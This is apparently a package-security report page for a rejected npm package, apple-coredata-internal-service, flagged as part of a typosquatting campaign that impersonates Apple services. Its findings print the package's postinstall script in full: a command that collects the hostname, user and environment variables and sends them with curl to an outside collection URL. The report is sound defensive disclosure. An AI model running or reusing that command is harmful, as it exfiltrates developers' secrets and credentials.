All apple-coredata-internal-service versions

[email protected] rejected Risk: 100 No license

apple-coredata-internal-service @1.0.0

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
npm Tarball
100
Risk Score
License
Yes
Install Scripts
0
Dependencies
0
Dev Dependencies
.4 KB
Package Size
Published

Internal research utility for infrastructure audit

Maintainers

raya4321

Risk Dispositions (1 applicable to this version, 0 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule Source Disposition Author Reason
install-script:postinstall install-scripts reject AI AI (install-scripts): Postinstall is a hardcoded credential-exfiltration payload; malicious by design across all versions.

SAST Findings (4)

CRITICAL Package has 'postinstall' script install-scripts

[Always reject] Script: hostname >> info.txt && whoami >> info.txt && env >> info.txt && curl -X POST -F "[email protected]" https://franki.requestcatcher.com/apple_internal_leak

CRITICAL MAL-2026-3152: Malicious code in apple-coredata-internal-service (npm) osv

Malicious npm package published by threat actor "raya4321" as part of a coordinated typosquatting campaign impersonating Apple internal infrastructure services (authentication, PKI, telemetry, CloudKit, and cloud infrastructure). All packages in this campaign execute credential-theft payloads during npm installation via preinstall or postinstall lifecycle hooks. Trigger: postinstall. Exfiltrates environment variables, SSH keys (~/.ssh), AWS credentials (~/.aws/credentials), and ~/.npmrc to https://franki.requestcatcher.com/apple_full_creds via curl.

HIGH Low-value / spam package indicators (6 signals, score 8) bogus-package

Matched 6 signal(s), weighted score 8: • [S_PUBLISHER_MASS_PRODUCTION] Maintainer 'raya4321' owns 20 packages, ≥70% share a templated name shape. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 1 code file(s), 379 bytes total. • [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

Review Summary

Risk score: 100 (capped from 108). Findings: 2 critical (+80), 1 high (+25), 1 low (+3).

Published to npm: